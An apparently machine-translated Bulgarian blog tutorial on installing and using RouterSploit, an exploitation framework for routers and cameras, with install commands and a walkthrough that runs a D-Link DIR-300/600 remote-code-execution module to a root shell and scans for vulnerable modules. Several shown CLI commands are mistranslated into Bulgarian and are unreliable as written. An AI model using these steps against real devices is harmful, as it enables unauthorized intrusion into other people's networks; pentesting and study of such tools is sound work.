У дома » Linux инструменти » RouterSploit – Пълен урок за експлоатация на рамката [2020]

RouterSploit – Пълен урок за експлоатация на рамката [2020]

routersploit

RouterSploit е невероятна рамка за експлоатация, създадена специално за вградени устройства.

Този инструмент може да се използва от pentester за сканиране на сигурността на камери и рутери.

Акценти на RouterSploit:

  • Кодиран на Python.
  • Интерфейс на командния ред.
  • Поддръжка на Docker.
  • Модулни инструменти.

Поддържана ОС:

  1. MacOS.
  2. Linux.
  3. телефон с Android.
  4. Windows.

Инсталиране на RouterSploit:

Изисквания:

  • бъдеще
  • заявки
  • Парамик
  • спрете
  • пикрипто

Не е задължително:

  • bluepy – bluetooth ниска енергия

Инсталиране в Kali Linux:

Следвайте командите по-долу:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy поддръжка:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Инсталиране в Ubuntu:

Следвайте командите по-долу:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy поддръжка:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Инсталиране на MacOS:

Следвайте командите по-долу:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Инсталиране на Docker:

Следвайте командите по-долу:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Как да актуализирате RouterSploit?

Трябва често да актуализирате RouterSploit, за да избегнете неудобства.

Новите модули се доставят почти всеки ден.

cd routersploit
git pull

Как да използвате RouterSploit?

Използване

root@kalidev:~/git/routersploit# ./rsf.py
 ______ _ _____ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 _| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Рамка за експлоатация за    |_|   от Threat9
            Вградени устройства
  
 Кодово име   : Знаех, че си проблем
 Версия    : 3.3.0
 Начална страница   : https://www.threat9.com/ - @threatnine
 Присъединете се към Slack : routersploit.slack.com

 Присъединете се към програмата Threat9 Beta - https://www.threat9.com/

 Подвизи: 128 Скенери: 4 кредити: 165 Generic: 4 Полезни товари: 32 Енкодери: 6

rsf >

Подвизи:

За да се извърши експлоатацията, просто изберете модула и задайте целта:

rsf > използва експлойти/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > използвайте exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

За завършване използвайте клавиша tab.

За показване на опции, Типshow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > покажи опции

Целеви опции:


   Име Текущи настройки Описание                                
   ----       ----------------     -----------                                
   target Целеви адрес напр. http://192.168.1.1     
   порт       80                   Целеви порт

Използвайтеrun илиexploit команда за използване на целта:

rsf (D-LINK DIR-300 & DIR-600 RCE) > бягам
[+] Целта е уязвима
[*] Извикване на команден цикъл...
cmd > ами
корен

За да зададете опции:

rsf (D-LINK DIR-300 & DIR-600 RCE) > задайте цел http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Възможно е да проверите дали целта е уязвима за конкретен експлойт:

rsf (D-LINK DIR-300 & DIR-600 RCE) > проверка
[+] Целта е уязвима

Бягайshow info за показване на информация за експлойта.

Сканиране за уязвими цели:

Скенерите позволяват бързо да се провери дали целта е уязвима за експлойти.

Използвайте същите команди за показване/задаване на опции, а също и да тичам.

rsf (D-Link скенер) > бягам
[+] exploits/dlink/dwr_932_info_disclosure е уязвим
[-] exploits/dlink/dir_300_320_615_auth_bypass не е уязвим
[-] exploits/dlink/dsl_2750b_info_disclosure не е уязвим
[-] exploits/dlink/dns_320l_327l_rce не е уязвим
[-] exploits/dlink/dir_645_password_disclosure не е уязвим
[-] exploits/dlink/dir_300_600_615_info_disclosure не е уязвим
[-] exploits/dlink/dir_300_600_rce не е уязвим

[+] Устройството е уязвимо!
- exploits/dlink/dwr_932_info_disclosure

Официален RouterSploit

Прочетете също: 1337x прокси

Заключителни думи:

RouterSploit е невероятен инструмент за използване.

Ако се сблъскате с проблеми по отношение на RouterSploit. Не забравяйте да коментирате по-долу. Нашият екип CSHAWK ще се свърже с вас възможно най-скоро.

Оставете коментар